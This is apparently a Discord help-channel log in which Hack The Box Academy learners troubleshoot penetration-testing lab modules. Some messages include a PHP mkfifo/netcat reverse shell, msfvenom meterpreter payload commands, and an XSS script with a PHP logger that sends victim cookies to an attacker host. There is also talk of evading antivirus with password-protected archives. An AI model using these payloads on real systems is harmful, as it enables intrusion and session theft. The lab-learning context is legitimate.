Can anyone tell how to get started with bluetooth attacks ? Specially bluebugging

not sure HTB has a module on that

:/ any other source ?

Intro to Hardware attacks covers this.

Ok

I've been waiting for 10 mins + on a specific IP to pop up in my responder output for "NTLM Relay" module (first practical type question) - is this expected?

ty

Np. Did you get it sorted out?

yeah. im happy now

Probably not, but hard to say. You should include the section you're on to get better help. Sometimes you need to coerce with NTLM attacks.

I've got it in analyse mode & grepped for that IP in the log output & haven't received anything, I'll reset it..

hello

does someone know wcvs.

i am getting this error

./go/bin/Web-Cache-Vulnerability-Scanner -u http://94.237.54.170:56841/ -sp language=en -gr
WCVS v1.0.0 started at 2024-09-28_22-46-11
Exported report ./2024-09-28_22-46-11_WCVS_Report.json
error (wordlists/headers: open wordlists/headers: no such file or directory)

@hot owl is this from a module?

yes Abusing HTTP Misconfigurations

do i have to download wordlist for it?

a restart fixed this.

I'm kinda stuck at the intro to whitebox pentesting - skill assessment. Is anyone available for help?

Should be added that it's Q2 🙂

Quick question: doing the AD Lab I right now.
I'm extracting files to my attack host, through the RDP share (xfreerdp shared disk) and it's AWFULLY slow (355KB/s) any idea how to improve that, or faster ways to exfliltrate files?

Just thinking that this could drive me crazy during an exam...

yeah rdp drive is very slow, use something else like http

Ok thanks!

Hi there ! I'm just starting out with CDSA, yet already stuck with the "Incident Handling Process | Detection & Analysis Stage (Part2)"question...pls! would anyone give me a hint on that?

Can I dm you? In regards to command injection skills assessment?

Yes sure

Hey I m stuck since 2 day at the Custom wordlist section from the Brutforce module. Can someone help me a little bit, because I dont really understand the question ...

Hey in linux priv esc section

The logrotten part i try to run a command to get a shell connection

./logrotten -p ./payload ./backups/access.log

But i get an error saying version GLIBC_2.34 NOT FOUND ANY HELP

make sure you understand what the sharpup output means

aight

its just telling you to brute force the login

Did I send you a response earlier regarding this one? If so, you can DM me.

why not try to make your own msi

Well yeah my answer was to enumerate more, lol.

okkkkkkkkkkkkk

rigth

wait i tried one things

Like I said you can DM if you'd like.

Yeee

sup

type shi

mhmm when I make my own msi:

Hey guys. Im currently working on module "Getting Started" on Nibbles - Initial Foothold. I run ip a and i put my tun0 address in this command:
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc my_ip 9443 >/tmp/f"); ?> . I uploaded the file ,saved the changes, and know im trying to nc -lvnp 9443 but it doesnt show anything, it just keeps listening. Shouldnt it show this:
listening on [any] 9443 ...
connect to [my_ip] from (UNKNOWN) [10.129.42.190] 40106
/bin/sh: 0: can't access tty; job control turned off

you got the wrong ip or port then

are you able to click through that and still execute it?

im just using the port htb uses

what about the ip

i run ip a and i use my tun0

i think it worked i managed to connect with the password i added on Administrator but the ip expired go try again

try restarting the machine then, if that doesnt work then its definitely your command

still the same

should i use another port?

is tun0 your vpn ip?

and you changed my_ip in the netcat command (nc)?

yes and how can i see what my vpn ip is?

Actually i just blindly used tun0 cause it said so

type ip a in the terminal and look at your adapters

lo enp0s3 tun0

ok so when you make your php did you replace my_ip with the tun0 ip?

certainly

hard to say without seeing the actual code and command

the port matches your netcat listening port?

yep
nc -lvnp 9443
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc my_ip 9443 >/tmp/f"); ?>

did you navigate to your page

if the ip and port are correct then something else is wrong, maybe go through all the steps again

I mean all i have to do is login to admin.php(which i did), go to plugins -> my image, upload the php file and then netcat

I need help on ffuf module. I think my answer is right but question is keep saying its wrong. I dont get it. Where I need to write or open ticket?

Okey,Solved it.

hey, i just noticed i cant connect to the ssh server in the Web Section from the Login Brutfocing module

does someone have an idea of a possible fix ? or a workaround solution ?

Web Proxies § ZAP Fuzzer
Hint says to look for a response with a different Content-Length, but ALL responses have a Content-Length of 410. Why? any ideas?

Are you using the md5 hash processor and on the correct page?

MD5 hash processor yes, and trying on the /skills/ page, why? Is there another page I need to brute force to test it on?

no just making sure

Well, what else is there? Did a search for this module on this channel and noticed that someone else was mentioning a missing character in the cookie; does that need to be cracked offline before another fuzz is attempted? And what about the cookie itself; no mention about it needing to be edited into the header either, which is strange considering it makes one wonder how ZAP is able to authenticate with it.

And tried without making any header modifications at all; again, nothing. A different size (246 bytes) but the responses are still all that size; there's no mix of 246 and any other response size. Again, why?

could be any number of reasons really, maybe just go over the section again and confirm everything is set correctly

just sounds like something isn't setup correctly

Fuzz location: check.
Payload: check (have ` top-usernames-shortlist.txt saved as a Custom File Fuzzer so I don't need to keep providing the full path to it every single time).
Processor: MD5 hash (check).
Options: defaults, because the module didn't tell me to make any changes to them.

So, what is wrong with this setup exactly?

Do I need to set the Set-Fetch-Dest, Set-Fetch-Mode and Set-Fetch-Site options that are mentioned in the module screenshots but that ZAP doesn't set at all?

I'm also noticing a Priority header, which is set by ZAP but isn't set in the screenshots the module provides, so if there's a ZAP setting to force it to set different headers than the ones it's setting, it would be appreciated.

Is there a setting I need to change in ZAP to tell it to find the cookie-hashed username?

idk i just tried it with all the correct settings and got it right away

there was one length clearly longer than the others

i did it with burp though i have to go to the store so i don't have time to setup zap right now

should be pretty similar though just make sure you're doing what the question asks and it should work

Again:

• Payload: top-usernames-shortlist.txt
• Processor: MD5 Hash

What do I need to set in Options to make this work? Because that's the only problem at this point.

can someone help me with the custom worklist section in the login brutforce course ? I tried several username lists and password lists, but i didnt crack it

did i do something wrong ?

If you can drop the link to the section you're on, I'll take a look at my notes.

Retries on I/O Error? Max Errors Allowed? Follow Redirects? Hello?

Tried enabling Follow Redirects; it too was nothing.

nevermind, i solved it, just was to stupid to read the whole text again (did the module in the past but they made some changes and i tried the old version of it ) 😭

Decided to manually edit the headers to make them match the headers in the headers in the module. Again, still nothing.

If you want to DM screenshots of what you have on your end, I can take a look at them and see if anything is off from my notes.

Preparing them; hold on

All good I have some time.

Done

hi i have a problem with a specific question in a module JavaScript Deobfuscation , the answer (flag) seems to be right but the server won't accept it

https://academy.hackthebox.com/module/41/section/442

it would be helpful if someone could test it

Did you add HTB{} to it?

you don't need to post the flag in here

https://academy.hackthebox.com/achievement/1267476/15 || I finaly start to take action towards my goal

In https://academy.hackthebox.com/module/116/section/1169
I found the password for the "mssqlsvc" user. However when I try to log in using either sqlcmd or impacket-mssqlclient it doesn't work.
I even tried the following from the solutions part:
"sqlcmd -S STMIP -U .\mssqlsvc" and it does not work either (login error in both cases). Has anyone a clue of what would be the issue?

yes i tried every posssible input laout

thanks for the help

actually '-windows-auth' is needed for the impact approach. Problem solved.

Idk if this is the appropriate place to ask but can someone explains to me what exactly is a nameserver?
What I understand is that it is the record that tells you the ip/FQDN of the actual dns server that has the dns records, but what I am not getting is how are these nameservers FQDN themselves are resolved?

through dns records for the domain

Like when doing
Dig axfr inlanefreight.htb @ns1.inlanefreight.htb
How is it getting the ip of ns1?

in that instance, it's because you specificed ns1. in your /etc/hosts file

when a domain is registered the registrant specifies a set of authoritative DNS servers, those are the servers responsible for storing the DNS records for the domain

but isn't that ip corresponding to inlanefreight.htb itself?

no, the ip you put in /etc/hosts corresponds to the host you pair it with in /etc/hosts

when a DNS request from a computer is made, the computer will first check itself to see if that is the host being called. after that it checks the hosts file, then it reaches out to the DNS server. so its obtaining the host from the IP you set in the hosts file.

And these are called nameservers right?

the authoritative dns servers are a type of nameserver

What I am not getting is that when I get the ip from htb for instance and I see that port 53 has a dns, does that means that ip is a nameserver since it stores dns records?

no. any app can be running on port 53, it doesn't really mean anything unless the service running on that port is something that responds to dns requests, which by default is what's used for port 53

Also, what is the process of assigning a specific host name to an ip address like when we do for boxes on htb main platform?

I mean yeah ik I meant like bind9 server on port 53

may i dm anyone for this module Shells & Payloads>PHP Web Shells

just ask here

module Shells & Payloads>PHP Web Shells
Q/ Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif)

when i uploaded WhiteWinterWolf's PHP Web Shell and intercept by burpsuite to change the connect-type from application/x-php to image/gif and now i try to use the web shell

https://ip/images/vendor/connect.php didnt work

Have you modified the IP and port in the php file to match your IP (VPN or pwnbox) + port you use for your netcat listener?

did you try navigating to the php file you uploaded

just normally, without burp

I used ||msfvenom -p php/meterpreter/reverse_tcp|| for that one. Worked like a charm.

ahhh its not revrse

and its working there were some lines that didnt count

i tried again with copy raw file and it works

i used msfvenom to create a shell and reverse it to my meterpreter then i found the user and the password for sr*****i'm stuck here can't do anything i tried to create pssession but that open a new powershell but i can't do anything with it i tried get-sqlquery also that didn't work it just freeze what i'm missing here ?

which skill assessment

DM @rocky estuary

the AD the first one

sr* user?

sorry sv*_

now i need to access the ms01 domain

have you tried using the credentials across the network

i tried to create pssession that didn't work and also tried Get-SQLQuery that didn't work also

what about netexec

Has the proxyshell exploit in the Vulns section under Exchange in the AD path worked for anyone? Just dies for me after a long time

what it does ? it this mentioned in the module ?

it's the maintained fork of crackmapexec

We know it is, so why won't this imported payload processor script show up in the ZAP Fuzzer script drop-down menu like it's supposed to?

yes

crackmapexec

For context @safe star @proper oar this is in relation to Question 3 of the Web Proxies skills assessment. I'm trying to add a script to allow for the automatic encoding (not decoding) of ||Base64|| into ||ASCII Hex|| as part of the Web Proxies skills assessment. ZAP recognizes that the script has been successfully imported, but the fuzzer doesn't.

where is the correlation

^

i also dont remember using a script for payload processing

What other way is there? Because although ZAP does come with an ASCII hex encoder/decoder, the ZAP fuzzer doesn't.

so use another tool

A crippleware tool?

you'll find the community version of burp is quite capable

yeah i used burp for that too

there are also two tools imo that a company should pay for the pro version for, for pentesting. burp suite and nessus.

real, imagine pentesting webapps without burp pro

Anyone moved to caido yet?

caido is still missing a lot of features last time I tried it

It's developping pretty quickly.

I'm actually using Burp CE and paying Caido for support :p
That way we put pressure on Burp to either lower the prices of Pro, or include more features in CE to be competitive :p

For gobuster directory finder, what the shortest word list? The one provided (usr/share/dirb/wordlists/common.txt) doesn't exist

I can only find usr/share/dirbuster/wordlists/ and it doesn't contain a common.txt

Wait what time is it rn my phone won’t show

I tried use directory-list-2.3-small but it still takes like super long for it to fully complete

Time is relative but 1pm +8GMT

No but like just the regular time

Like 5:45 :600

You can try running locate for the word list, iirc this is the same one

usr/share/seclists/Discovery/Web-Content/common.txt

Ahhh

actually time passes more slowly for objects moving close to the speed of light or strong gravitational fields (time dilation), this means time is actually objective, a physical reality that exists independently of human perception

This channel is for HTB modules only see #rules and #welcome

Hi,

Module: Attacking Common Applications
Section: WordPress - Discovery & Enumeration
Section link: https://academy.hackthebox.com/module/113/section/1100

I am not able to find the plugin:

Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).
I have checked categories, archives, author, search pages source code. Can anybody give any hint please?

Enumerate the website and not just the home page

I have checked other pages as well. I tried clicking links present on the home page that sends requests with various query parameters. I have checked ||view-source:http://blog.inlanefreight.local/?cat=1||, ||view-source:http://blog.inlanefreight.local/?m=202108||, ||view-source:http://blog.inlanefreight.local/?author=1||, ||view-source:http://blog.inlanefreight.local/?s=ship|| but none of them reveals any new plugin.

did you grep for "plugins" on each page

Keep digging, there are other pages

yes.

Okay

its there, just easy to miss, look at every highlighted word

I checked one more ||http://blog.inlanefreight.local/?feed=rss2|| but same behavior. I am not able to find the plugin name 😦

Hey guys, do you know a good cursus or blog post or something else where you can learning making you own payloads?

Hey in linux priv esc section The logrotten part i try to run a command to get a shell connection ./logrotten -p ./payload ./backups/access.log But i get an error saying version GLIBC_2.34 NOT FOUND ANY HELP

What type of payloads

like reverse shells

so i can craft my owns

and i can understand what happens

also little question about archive a payload, archive is just like crafting it with compression, obfuscation, putting a password on it etc to bypass anti viruses right?

Hii

theres a reverse shell payload for majority of tools you can think of, the best thing to do is just break the command down and understand what it does

its gonna get detected once unzipped

Yeah but not when you set a password on the zip?

i mean thats what i saw in the module

what is the password going to do tho?

just going to stay like that until unzipped

what module

Hello, I'm scanning a machine in Job Role path where the question is "Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080? "
I ran a scan on machine but this does show the version of service running on port 8080. It just show "Apache tomcat"

Hi All, First time posting: Nice to meet you all.
in the module: Windows Attacks & Defense
the module keeps making reference to a dictionary for hashcat called password.txt, forgive my ignorance, but where do i find this dictionary? i have been using my own/john and i assume it would be faster to use the one they ref but i cant find it

You looked in the resources provided by htb at the top right of the section page ?

Use -sC -sV

I got an answer. It was just "Apache Tomcat". I was thinking that it will some kind of number. Is that not a meaning of version? or I'm thinking in wrong way

unfortunatly no resources are provided in that moduel

I didn’t do this module try with rockyou lol

Fun fact u can also do it like -sCV

basically what im doing currently, just wanted to know if anyone had a location on the file mentioned in the module

I think Apache tomcat hide their version for security reasons you can see the version that if you go to the site

Module: Windows Privilege Escalation
Section: Initial Enumeration

I see less permissions when I run the command whoami /priv in a regular PowerShell window compared to when I right click PowerShell and click "Run as Administrator". In both cases when I run just whoami, it returns winlpe-srv01\htb-student.

Can someone please explain why more permissions show in the window that's being "Run as Administrator"?

FYI, I ran net localgroup Administrators, and the output doesn't list winlpe-srv01\htb-student as part of the Administrators group, so now I'm confused how I was able to even run PowerShell as Administrator.

Administrator
helpdesk
htb-student_adm
mrb3n
sccm_svc
secsvc

hello in this question i ran the command and it taking very long it say remining about 50m am i doing it correct? can i say the command here or no?

important to recognize the difference, use the top 10000 ports or whatever its called --top-ports 10000 i think the modifier is

-sT -p-

ok, yeah its the port part, try reducing the number of ports, leave the one you got going and start a new one

Hey guys, I know the OSINT: Corporate Recon module is not part of the CPTS but do you think it's worth the cubes to get it? To improve my recon methodology.

so --top-ports 10000?

scanning all ports takes a WHILE, add in the tcp 3-way and you're compounding it

Module: Pivoting, Tunneling, and Port Forwarding
Section: Meterpreter Tunneling & Port Forwarding

Question 2 - Segmentation Fault on the pivot host and meterpreter session closes immediately upon executing the elf binary on the pivot host. What am I doing wrong?

Ive checked and double checked all params\

yeah something like nmap ... --top-ports 10000 im double checking that syntax im pretty sure thats it though

i think ippsec uses thats option as well to speed up the scans on a preliminary

or maybe i picked that up somewhere else but it speeds up the scan considerably while still scanning valuable ports

imma scan and see if it give me correct answer

it might be --top-ports 1000 (someone here told me theres another cmd that is inclusive of this) let me spin up my kali and check my alias

i think you meant -F

fuckin broke my kali vm a few weeks ago trying to be a cool guy, aint wanted to touch the thing ever since

that okay imma try something else

yeah its similar to -F but that only does top 100

you can start there though that may be advisable

yeah start low and work your way up, 65k port scans plus tcp connect takes ages

here's what my nmap alias looks like for actual boxes nmap -sC -sV --top-ports 1000 -Pn 10.10.11.22 -oX - | nmap-formatter html > ~/r/blazorized/blazorizedNmap.html just to give an idea

i think the nmap-formatter part may be redundant? there might be a way to get that output with just straight nmap but that plugin helps colorize it and stuff, i get tunnel vision looking at nmap output so i use that

the -F give me 7 ports and higest is 445 which wrong imma try top 1000

got it thank you
nmap -sC -sV (IP) --top-ports 1000 -Pn -oX target.xml

ok so keep in mind that -F and --top... dont give the HIGHEST ports

they give me the most common or popular

right thank you

Module: Pivoting, Tunneling, and Port Forwarding
Section: Meterpreter Tunneling & Port Forwarding

Question 2 - Segmentation Fault on the pivot host and meterpreter session closes immediately upon executing the elf binary on the pivot host. What am I doing wrong?

Ive checked and double checked all params

Module: Active Directory Trust Attacks
Section: Abusing SQL Server Links
I am unable to RDP into the machine when I use the provided credentials (Administrator:HTB_@cademy_adm!). I also tried to PSexec into the machine but I keep getting Login failure (so likely linked to the provided creds). Can someone check the config of the box please? I've also provided the logs from RDP and Psexec:

[12:05:24:838] [47796:47797] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[12:05:24:838] [47796:47797] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[12:05:24:838] [47796:47797] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail

Password:
[-] SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information.

The credentials for Jimmy & htb-student are provided in the section along with the RDP command.

ok thank you, let me give it a ggo

Module: Pivoting, Tunneling, and Port Forwarding
Section: Meterpreter Tunneling & Port Forwarding

Question 2 - Segmentation Fault on the pivot host and meterpreter session closes immediately upon executing the elf binary on the pivot host. What am I doing wrong?

Ive checked and double checked all params

Please send the msfvenom command you are using to generate the payload.

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<My IP> -f elf -o backupjob LPORT=8080

Maybe the issue isn't with the payload. Did you configure the listener properly?

followed this exactly

I used the below creds and I still can't RDP into ACADEMY-ADTRUST-CFSQL01

Do you trust the above certificate? (Y/T/N) Y
[12:23:54:796] [57281:57282] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[12:23:54:796] [57281:57282] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[12:23:54:796] [57281:57282] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[12:23:54:796] [57281:57282] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
                                                                                                                                                                                                                                            
┌──(root㉿kali)-[/home/kali/Desktop/Academy]
└─# xfreerdp /u:htb-student /p:'HTB_@cademy_stdnt!' /v:10.129.86.205 /dynamic-resolution /drive:linux,/tmp
[12:24:14:666] [57486:57487] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[12:24:14:666] [57486:57487] [WARN][com.freerdp.crypto] - CN = SQL01.inlanefreight.ad
[12:24:14:870] [57486:57487] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[12:24:14:870] [57486:57487] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[12:24:14:870] [57486:57487] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[12:24:14:870] [57486:57487] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1```

Just checked and it's working fine on my end. Did you wait for 2-3 mins after spawning the target?

no why do I have t wait 2-3 mins?

did your target expire?

ping the target? also svcs take a few minutes to boot on windows boxes, thats why you wait af ew

It takes approx 2-3 mins for the VM to be completely UP along with the Domain Controller

ok let spawn it again. I will keep this in mind

could i get help with pivoting? followed the guide to a T but still get errors after resetting the machine

Which IP address are you using?

10.10.15.15

my machines IP when connected via VPN

you can put tun0 there, i believe. someone here showed me that. make life a lil easier.

Can you send the error that you get when you execute backupjob?

Segmentation Fault (core dumped)

same thing happened

oh no, yeah, i realize you're dealing with a separate issue just wanted to pass along a trick i found helpful

May be the issue is that you are using the staged payload linux/x64/meterpreter/reverse_tcp. Can you try using the stageless payload linux/x64/meterpreter_reverse_tcp instead?

You are not setting up the payload when using exploit/multi/handler module.

can you tell if payloads are staged or not? is that in the show info of each payload? or whatever the cmd is

I have another issue when trying to connect to SQL02\SQLEXPRESS:

SQL query: select * from openquery("SQL02\SQLEXPRESS",'select SUSER_NAME()')
Logs:
OLE DB provider "MSOLEDBSQL" for linked server "SQL02\SQLEXPRESS" returned message "Login timeout expired".
OLE DB provider "MSOLEDBSQL" for linked server "SQL02\SQLEXPRESS" returned message "A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online.".
Msg -1, Level 16, State 1, Line 0
SQL Server Network Interfaces: Error Locating Server/Instance Specified [xFFFFFFFF].

Completion time: 2024-09-30T05:40:29.2162914-07:00

i saw you had lhost in your cmd, you do have rhost set right? your target? sorry if this has been covered already.

theres no option for rhost

oh i see, right on. just a sanity check

msfvenom payloads follow the format OS/architecture/payload_type. Generally for staged payload, payload_type is multiple valued separated by / and for stageless, its a single value. However, you can accurately find that out by using msfvenom -l payloads command which gives description including whether the payload is staged or stageless.

oh i see, i dont think ive ran into those yet. ill have to keep that in mind, alongside the info you metnioned about setting up the multi stange handler, i assume thats something "extra" you have to do?

In the msfconsole, after use exploit/multi/handler, you can see the message Using configured payload generic/shell_reverse_tcp. Before executing run, you should also set up payload as set payload linux/x64/....

ohhhhh ok lemme try

ok, got the right module but now theres no "run" command

@tribal plinth Any chance you can have a look at my previous message. I am unable to run queries on SQL02/SQLEXPRESS from SQL01/SQLEXPRESS

Just checked and it's working fine for me

I ran this SQL query from SQL01\SQLEXPRESS
select * from openquery("SQL02\SQLEXPRESS",'select SUSER_NAME()')

Yup, same!

OLE DB provider "MSOLEDBSQL" for linked server "SQL02\SQLEXPRESS" returned message "Login timeout expired".

Where can I ask some questions to clear my doubts ?

I believe you did use linux/x64/meterpreter/reverse_tcp instead of set payload use linux/x64/meterpreter/reverse_tcp.

OLE DB provider "MSOLEDBSQL" for linked server "SQL02\SQLEXPRESS" returned message "A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online."

Run the command in the same order as this.

.

here

What kind of doubts

General problems about like pentest stuff.

Windows PrivEsc - Built in groups
after backing up the entire c drive to e, i still can't take a backup of ntds.dit

made sure that SeBackupPrivilege is enabled

same with the contract file too

replication issue? for the new privs?

what is that

may not come into play here but sometimes the DC needs to replicate changes to user accounts, group memberships, priveleges, etc.

didn't get it

like dc needs time to make changes?

i mean surely this is not the case

ok robocopy worked

but still why the first method didn't

ok cracked administrator but can't rdp

logon failure means the cres are wrong

literally from hashcat

that's what the error means

also why do you even need to crack it? just pth

tried that too

still logon failure

well that's what the error means

i mean how then??
got the hash from the ntds dump so should be correct right?

i even copied the file from the system32 folder instead of using the one that the author of the section forgot to delete

did u specify the domain alongside the acct?

eagle\administrator vs administrator ?

or w/e it is... eagle.local, contoso.local, etc.

dumped sam too, same hash

Hello Guys Does anyone know where is the channel of HTB CTF because I want to ask questions regarding the CTF ?

no but it is auto detecting it right?

No. it must be specified or a (non domain) Admin acct may be trying to be logged in

nah xfreerdp detects the domain

oh, i see, didnt know that

never a bad idea to include it just as a sanity check

OK does windows has something like su

Rdp with htb student works just fine

I'm checking but like I said, that error means the creds are wrong, have you tried using the others?

Lol
Did runas
Also said wrong creds

other users also says wrong

what are the other users

ntds has kerberos tickets but i don't wanna go into that weed

lol literally tried pth for svc_backup with the hash in this file and it didn't work

is this bugged or something?

Hello all. In the "SeImpersonate and SeAssignPrimaryToken" section of the "Windows Privilege Escalation" module I can't connect to the target via RDP (using remmina from pwnbox). Same thing if I use the vpn from a local pc. The error message is "Cannot connect to the RDP server". Any ideas?

seems like the diskshadow is backing up the old file and something weird is going on with copying ntds locally, dcsync does return the right hashes and yea they're different

contect support to sort it out thanks

Module: Cross-Site Scripting
Section: Session Hijacking
I had both script.js and index.php preped:
script.js
||new Image().src='http://VPNIP:PORT/index.php?c'=+document.cookie;||
index.php
||

   $list = explode(";", $_GET[c]);
   foreach ($list as $key => $value) {
       $cookie = urldecode($value);
       $file = fopen("cookies.txt", "a+");
       fputs($file, "Victim IP: {$_SERVER['VPNIP:PORT']} | Cookie: {$cookie}
");
       fclose($file);
   }
}?>``` ||  
I had the php listener running in 0.0.0.0:80 and inputted the XSS payload ||">  ||  (with the VPN ip and port of course) and sent to the hijacking form.
But afterall, even had I obtained a 200: GET /script, I couldn't obtain the cookie from the target.
Can someone point out some mistakes I missed?
(Its all in the same dir where the php listener hosted)

hello! someone did the module login brute forcing?

DM me

I am in Skills Assessment Part 1 and i have a question because i cant do it jajaja

can anyone help me, i am not able to open http://gitlab.inlanefreight.local:8081/ and i have already added it on my hosts file, and i am on Attacking Common Applications - Skills Assessment II

i am a stupid, it was on some other port

Ok

Hello everyone

Does anyone know anything about this? #modules message

Hi Everyone, I'm working through Password Attacks, the Linux Local Password Attacks section. I have Will's password and am trying to get root's, but have hit a wall. I found the .backups folder, downloaded the .bak files to my attack system and unshadowed them. Sadly my attempts at cracking the hash with hashcat have failed. I used the same command as the reading, am I missing something?

Hi

That's where windows tends to get complicated. In short when UAC is enabled, to protect the system, even if a user has been granted some privileges, they are disabled unless specifically enabled. I know that does not even scratch it and HTB does not explain it much either. For me what really helped understand is this video series, at least first video and first half of the second one, then it gets more advanced.
https://www.youtube.com/playlist?list=PLwb6et4T42ww94O3z5QDNQsO1f_BwhX-L

So are you on this section: Passwd, Shadow & Opasswd?

Yep

For the Cross-Site Scripting (XSS) module and section phishing I got my answer and somehow its getting denied

If no one can help out, I'll have some time in a bit.

Okay, I am using my phone right now since I'm at work, but any direction is helpful

worked! cheers

Jumping in a meeting myself.

what wordlist did you use?

rockyou

This one was a little tricky. While many modules have sections that are totally isolated, the password attacks module has sections that are a little more cohesive.

you can dm me if you still facing problems

Hi iam stuck the task number 4 while the others were solved https://academy.hackthebox.com/module/218/section/2357

there’s another wordlist provided you want to use. its in recources

This one has definitely proven to be tricky for sure!

Okay, I'll give that a go, thank you!

Thanks for the reference. Will definitely check it out.

I'm out of my meeting, but it looks like you got some assistance.

o

can someone explain why hydra gives out false positives?

anyone doing the nmap module?

basically nothing is working for me, im trying to find the service versions but im getting filtered and host unreachable

What section are you on? Sometimes terminating and restarting the lab helps. Redownload the VPN too if you're not getting at least a ping response from the target.

download the VPN
Not if you're using pwnbox though, just restart the lab

If you're still having trouble, let me know the section and I can give you a sanity check.

im reseting the box and switching to pwnbox

yeah ping wasn't working, let me check now

guys is there any issues with the academy VPN ?

maybe

i had trouble with nmap

try pwnbox

having a strange issue when i sV a ip i dont see the full version name the questions asking for

command?